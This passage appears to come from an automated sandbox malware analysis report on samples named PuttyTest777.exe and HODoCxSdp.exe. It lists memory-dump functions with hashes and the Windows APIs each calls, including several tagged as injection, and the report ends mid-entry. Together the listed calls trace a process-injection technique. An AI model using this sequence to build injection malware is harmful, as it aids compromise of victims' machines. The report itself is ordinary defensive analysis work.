Instruction Fuzzy Hash: C641BFB0C00759CBDB24DFA9C844BCEBBF5BF49314F20806AD419AB251DBB56949CFA1

Function 008B4EA4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 008B63D1

Memory Dump Source

Source File: 00000003.00000002.1739607334.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8b0000_PuttyTest777.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d710b4bd934f9db7849c7168c2a48300d93f2b35ed57953fd8958f70cb784607
Instruction ID: 3bdfeaba72a4333da92e4e41c2d69f25ac807ead70f2fc2647e751a1abc4731e
Opcode Fuzzy Hash: d710b4bd934f9db7849c7168c2a48300d93f2b35ed57953fd8958f70cb784607
Instruction Fuzzy Hash: 43419FB0C00719CADB24DFA9C844BDEBBF5BF49714F20806AD419AB251DBB56949CF90

Function 06F35668 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F35700

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ec83c333743b4bd7dc953d8878cec20a8a0d113a81506a217aa734d497f0378a
Instruction ID: cb367f0348fa34a76180ec04cbe04534d7e2a57c132af21b0e3f6f64e31c10ea
Opcode Fuzzy Hash: ec83c333743b4bd7dc953d8878cec20a8a0d113a81506a217aa734d497f0378a
Instruction Fuzzy Hash: 412126B5D003599FDB10CFA9C885BEEBBF1FF88310F148429E959A7241C7789945DB60

Function 06F35670 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F35700

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4bff1bda0d279e8935b55648d5b75cd40fa8ec56f80a05f096789d15767ea074
Instruction ID: 565bcb7309e5ed4d0ae5e1a16e8351199190bc6c4421f3159f5c466470fabef2
Opcode Fuzzy Hash: 4bff1bda0d279e8935b55648d5b75cd40fa8ec56f80a05f096789d15767ea074
Instruction Fuzzy Hash: 272125B5D003199FCB10DFAAC885BDEBBF5FF88310F10842AE959A7241C7789944CBA4

Function 06F35758 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F357E0

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 29a50453ccf5f80e243342f9dd4cd0407733cddc89d688f6aa3ccb9cdcec9c41
Instruction ID: a4bf5a655cf7518c8b5e6edc42a068ae6e0d4c2816b0f8efe21addacf52505fe
Opcode Fuzzy Hash: 29a50453ccf5f80e243342f9dd4cd0407733cddc89d688f6aa3ccb9cdcec9c41
Instruction Fuzzy Hash: CF2125B5C003199FCB10DFA9C985BEEBBF5FF48310F10842AE559A7241C7789945DBA4

Function 06F35098 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F3511E

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 066a8e01b748210abbc5db6f3db2c4df0996719ea88ae7c2498584234d44056f
Instruction ID: 66e81d5ffc077ca0264496fd55575a5ac306e7513e1e74883fbc53329e1c343c
Opcode Fuzzy Hash: 066a8e01b748210abbc5db6f3db2c4df0996719ea88ae7c2498584234d44056f
Instruction Fuzzy Hash: 502149B1D003098FDB10DFA9C9857EEBBF5EF88314F54842AD459A7241CB789945CFA1

Function 06F35760 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F357E0

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9b79a2b66729274c3dab9ae1385bc2d2b122fbd54dbca848abd617ab7e80970f
Instruction ID: 8f975efe20286e5e4737977a632bfb442b2f9529a68e921d5af8fa74ed0612fd
Opcode Fuzzy Hash: 9b79a2b66729274c3dab9ae1385bc2d2b122fbd54dbca848abd617ab7e80970f
Instruction Fuzzy Hash: 232139B1C003599FCB10DFAAC885ADEFBF5FF48310F508429E559A7240C7789944DBA5

Function 06F350A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F3511E

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5ba2609901dceeae663412786db5a5a8c76e253f9ac64c536d7ee2226a89ad6e
Instruction ID: cee943a3c3560d7266aa6ba1cbdf41857e7e0bcf07cab7ebd503a505589f7baf
Opcode Fuzzy Hash: 5ba2609901dceeae663412786db5a5a8c76e253f9ac64c536d7ee2226a89ad6e
Instruction Fuzzy Hash: F12138B1D003098FDB10DFAAC8857EEBBF4EF88324F148429D459A7240CB789945CFA5

Function 06F355AA Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F3561E

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7257357e11f282daf22116513f94d9b41b78eebca174dd45110b1f5e44d29dee
Instruction ID: 416984fa7629bd6be3f403e9baeb0e5901ac32d6dae0527ba60140787f72723d
Opcode Fuzzy Hash: 7257357e11f282daf22116513f94d9b41b78eebca174dd45110b1f5e44d29dee
Instruction Fuzzy Hash: AC1153718003499FCB10DFAAC844ADFFFF5EB88320F20841AE559A7250CB75A944CFA0

Function 06F355B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F3561E

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d5208719ca227ed24174fa7ff22b303a1714aa0d584a62d16e261897f791271d
Instruction ID: a3121cf8eb6cb1b9592e48634fcd6fc22a4bb281f074b7fabad08ef35c3a536f
Opcode Fuzzy Hash: d5208719ca227ed24174fa7ff22b303a1714aa0d584a62d16e261897f791271d
Instruction Fuzzy Hash: 7C1123719002499FCB10DFAAC845ADEBBF5EB88320F248419E559A7250CB75A944CBA5

Function 06F34FE8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F35052

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 14669866f1b135db4c34cdd46cf614e14ab35e39fd3242554638d7c16274b6ca
Instruction ID: 86fb2da4744d7a459bbba661a1f4767ad73b6b637e6881420af7b960b0831058
Opcode Fuzzy Hash: 14669866f1b135db4c34cdd46cf614e14ab35e39fd3242554638d7c16274b6ca
Instruction Fuzzy Hash: 8D1146B19003498ECB24DFAAC845AEEFFF5AF88324F248419D459A7240CA759945CBA0

Function 06F34FF0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F35052

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c724486b857e7f292e7562167d613ccb2551ebb22eb41d893b39d450fa02cfe1
Instruction ID: b5887ca1ebd579930077c940638def5d6fe6cee21779ab49caf58668815ca153
Opcode Fuzzy Hash: c724486b857e7f292e7562167d613ccb2551ebb22eb41d893b39d450fa02cfe1
Instruction Fuzzy Hash: AC1136B1D003498FCB20DFAAC8457DEFBF5EF88324F248419D559A7240CB79A944CBA5

Function 06F37F2C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06F39CED

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 942af17a7a088d7afa27b14e696d162074d249770523da633f8060fad9d4e46c
Instruction ID: 4303a0575c34da058b5253bd4684a3410a1a7fece5c4998ba59f48ac88d3f81d
Opcode Fuzzy Hash: 942af17a7a088d7afa27b14e696d162074d249770523da633f8060fad9d4e46c
Instruction Fuzzy Hash: B411F2B5800359DFDB10DF9AD949BDEBBF8FB48320F108419E559A7200D3B5A944CFA1

Function 06F39C88 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06F39CED

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7c8b9ea331dabf2df5fc61db86a73ce7c2d09e9c521d1983e66dde64a46f72e3
Instruction ID: 6d461402a3fd459da8a31d905f47ecdc2c815071f6c7aac7fe60f7a62f9ff3db
Opcode Fuzzy Hash: 7c8b9ea331dabf2df5fc61db86a73ce7c2d09e9c521d1983e66dde64a46f72e3
Instruction Fuzzy Hash: 8E11F2B58003499FDB10DFA9D889BDEBFF4FB48310F10844AE459A3601D3B5A644CFA1

Function 0082D53C Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1738562405.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_82d000_PuttyTest777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc2bbecdd281a8b7b20d6f1dbd01ad25e400b652ccb9e3590ef47f8789644070
Instruction ID: 6ac1275d3617ba1d60ca599f495afdc052477e003bbc2f1c666177283a3e5c40
Opcode Fuzzy Hash: cc2bbecdd281a8b7b20d6f1dbd01ad25e400b652ccb9e3590ef47f8789644070
Instruction Fuzzy Hash: 52213AB1504344DFCB05DF14EAC0B26BFA5FBA4328F24C569E8098B346C376D896DBA1

Function 0083D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1738775360.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_83d000_PuttyTest777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdbd964c324409653336e07a3353691f7a1115f581676dd355372a62652b4c12
Instruction ID: 7ba1f9b1b068ccd06a571419293651a4a298e9091ed4e0a1a53ee9b35583f36b
Opcode Fuzzy Hash: fdbd964c324409653336e07a3353691f7a1115f581676dd355372a62652b4c12
Instruction Fuzzy Hash: 2A21F871504304DFDB05DF14E5C4B16BBA5FBD4314F24C56DD8098B351C736E816CAA1

Function 0083D0EC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1738775360.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_83d000_PuttyTest777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3c64c315072d8d9f24041e6e45a801aa17258b7e435a5669f9a247fdc9a752d
Instruction ID: aa732dd84d18025ffabaa558e2146949ad90cf6d83c8bd6ac673c752fa5e8145
Opcode Fuzzy Hash: b3c64c315072d8d9f24041e6e45a801aa17258b7e435a5669f9a247fdc9a752d
Instruction Fuzzy Hash: 6521F5B5604304AFDB05DF14E9C4B1AFBA5FB94314F24C96DD80A8B396C33AD806CAE1

Function 0082D537 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1738562405.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_82d000_PuttyTest777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: 0d5e452129964e58c2d2ca849437a7bec6f2ccb34eaf0a86f4d3e18d1c948c12
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: DF11E676504340CFCB06DF10D5C4B16BF72FB94324F24C6A9D8098B256C33AD85ACBA1

Function 0083D0E7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1738775360.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_83d000_PuttyTest777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 33cd8d04ef21f43132be69fae269b44f06a3d9270a7b1c6682bcdcf9de557a9c
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 8A118E75544340DFDB05CF14D9C4B19FB72FB84314F24C6A9D8498B656C33AD84ACB91

Function 0083D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1738775360.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_83d000_PuttyTest777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: b8467c7f612ef95cc822976a81b71c959a1ad2211ab7f2bb0e0c6c5d7454fbe1
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 6A11BE75504340DFCB02DF10D5C4B16BB72FB84314F24C6ADD8498B296C33AE80ACB91

Function 0082D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1738562405.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_82d000_PuttyTest777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cb4af97f9057144cb5b70080443bc54a3ce896f23e8fd2bdba220b3d13c3c31
Instruction ID: d98851bece03b2e3835275d746df037791a820487f6d592aa1a95f6ba9deff79
Opcode Fuzzy Hash: 3cb4af97f9057144cb5b70080443bc54a3ce896f23e8fd2bdba220b3d13c3c31
Instruction Fuzzy Hash: 5301DB710053549EE7105A25ECC4B66FFD8FF55325F18C81AED0D8B286C77D9880D671

Function 0082D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1738562405.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_82d000_PuttyTest777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43f46595d2838f3dbe98786ab06fbd8d14c61968f2de6f2a4bfbcc4c656fd560
Instruction ID: 84cee2cb67e679639127ba4e89ab136aaa2f526055f36dc6b571e47ed6a76671
Opcode Fuzzy Hash: 43f46595d2838f3dbe98786ab06fbd8d14c61968f2de6f2a4bfbcc4c656fd560
Instruction Fuzzy Hash: 5EF0C2710043449EE7208A16DC88B62FFE8EF50734F18C45AED084B286C379A884CAB1

Analysis Process: HODoCxSdp.exePID: 7476, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	174
Total number of Limit Nodes:	6

Executed Functions

Function 06D258F3 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D25B2E

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e94d17ade5a18b121d3564d055531ee1b36c5ab81aacec65cdc46f94d3ac9489
Instruction ID: 4b31e73753b75a816dc51fb28ee62858dfaaa2125ddf17a0442ebecbaeeb6ddf
Opcode Fuzzy Hash: e94d17ade5a18b121d3564d055531ee1b36c5ab81aacec65cdc46f94d3ac9489
Instruction Fuzzy Hash: 3C915E71D0032A8FDF64CF68D841BEDBBB2BF58314F1485A9D819A7240DB749985CFA1

Function 06D258F8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D25B2E

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6479ae75fe90942f375ccb41dc028a9381d5a2b52cdc17016f3134e87f74da77
Instruction ID: 446291a7379f4b20fd61715c4d7fd354fc85229394f30fc83e5c9c67c6b603df
Opcode Fuzzy Hash: 6479ae75fe90942f375ccb41dc028a9381d5a2b52cdc17016f3134e87f74da77
Instruction Fuzzy Hash: BA916E71D0032A8FDF64CF68D841BEDBBB2BF58314F1485A9D809A7240DB749985CFA1

Function 00D06314 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D063D1

Memory Dump Source

Source File: 0000000C.00000002.1780041467.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d00000_HODoCxSdp.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e5276ee9968ae477417b740ded7ae831906b0ade39ee8952efa744c1f51812ac
Instruction ID: 9638346b8d9f4a8119a6ef53dc3cf85280c5c3fc3d2e8a5e0f48e30522e69ca4
Opcode Fuzzy Hash: e5276ee9968ae477417b740ded7ae831906b0ade39ee8952efa744c1f51812ac
Instruction Fuzzy Hash: 884102B0C00719CEDB24DFA9C844B9EFBB5BF49714F24806AD449AB291DB71A945CFA0

Function 00D04EA4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D063D1

Memory Dump Source

Source File: 0000000C.00000002.1780041467.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d00000_HODoCxSdp.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 81eaadef22786bd5c1bfeedc111d30d273b5ce09e72da3907fc0d68a562c03f6
Instruction ID: f72ea35d6d3a9f49a6c70ca0785f3cbde783798f1140b5d5fe16cf95e5eba042
Opcode Fuzzy Hash: 81eaadef22786bd5c1bfeedc111d30d273b5ce09e72da3907fc0d68a562c03f6
Instruction Fuzzy Hash: 1C41E2B0C0071DCBDB24DFA9C844B9EBBF5BF49314F24806AD409AB291DB75A945CFA0

Function 06D25668 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D25700

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 754d3c0a82786d1031fc2d21e1a50f91f463f00ba4556d92bfd8af089dc77f74
Instruction ID: 07534322789ab767008062375a1bba35cb5c8af4d95dcace32f0508ca93d50ab
Opcode Fuzzy Hash: 754d3c0a82786d1031fc2d21e1a50f91f463f00ba4556d92bfd8af089dc77f74
Instruction Fuzzy Hash: 462155B5D003598FCB10CFA9C885BEEBBF1FB48310F148429E958A7240C7789940CBA0

Function 06D25670 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D25700

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ae4fc0bfe9a7d324a89051326a49ea4f83adde646cedb154deaac47d82fcc20e
Instruction ID: aba6615f5742882a04808b34ba8462de7b0fb8331e04cbe9fc8fc2d07bc37452
Opcode Fuzzy Hash: ae4fc0bfe9a7d324a89051326a49ea4f83adde646cedb154deaac47d82fcc20e
Instruction Fuzzy Hash: 312139B1D003199FCB10DFA9C885BDEBBF5FF48314F108429E919A7241C7789944CBA4

Function 06D2575B Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D257E0

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 556a003dd652adbfca6ccaa7745141f06ab2209054e93ebf5964117c2b8b6e4f
Instruction ID: fa42bcd1e8d37686cf2d464580c7511a370b252d1d15f084cff0cf157da08ec8
Opcode Fuzzy Hash: 556a003dd652adbfca6ccaa7745141f06ab2209054e93ebf5964117c2b8b6e4f
Instruction Fuzzy Hash: C72139B5C003599FCB10DFA9C885AEEFBF5FF48310F10842AE519A7240C7389945DBA4

Function 06D25760 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D257E0

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d56d21225eb74502d0cdb6b0a9f739860340eef130da41e4abd467fe976439a4
Instruction ID: e08e6f83cc882e1d544c3cef954e7ac483650161a52d8d1adcd49bf43328daa1
Opcode Fuzzy Hash: d56d21225eb74502d0cdb6b0a9f739860340eef130da41e4abd467fe976439a4
Instruction Fuzzy Hash: 47213AB1C003599FCB10DFAAC885ADEFBF5FF48320F508429E519A7240CB349944DBA4

Function 06D25098 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D2511E

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2d413c70b37941477dab0342faf99ef5b7285e8bd23865362e7a0dfe92b80c13
Instruction ID: 81c03e3b44f24be47eb7d2ff9423971e2866d66c8758764298a5b47b08402e5c
Opcode Fuzzy Hash: 2d413c70b37941477dab0342faf99ef5b7285e8bd23865362e7a0dfe92b80c13
Instruction Fuzzy Hash: 7E2137B5D003198FDB50DFAAC4857EEFBF4EB58324F14842AD859A7240CB789945CFA4

Function 06D250A0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D2511E

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 43ea530f53d83748cea6f8b2e7276aed7f8dca497c209288c9b5fad1e65b3663
Instruction ID: 22f5b5b9b02443ce1ff50366942dfcfa044d7f5b2b1c91125541d774154ea833
Opcode Fuzzy Hash: 43ea530f53d83748cea6f8b2e7276aed7f8dca497c209288c9b5fad1e65b3663
Instruction Fuzzy Hash: 3D2137B1D003198FDB10DFAAC885BAEFBF4EB58324F148429D459A7240CB789945CFA4

Function 06D255AB Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D2561E

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a64184d87eb6afa31bd3bbfcb4c5e5122b890450c90cbe1727c6f78437146170
Instruction ID: 9289843868d8dd940d0a221b0f4ef7d3b8f661e4fd9189f312be8435a789a5c4
Opcode Fuzzy Hash: a64184d87eb6afa31bd3bbfcb4c5e5122b890450c90cbe1727c6f78437146170
Instruction Fuzzy Hash: 7F1156718002499FCB10DFAAC849ADFFFF5EB88324F208419E519A7250CB35A940CBA0

Function 06D255B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

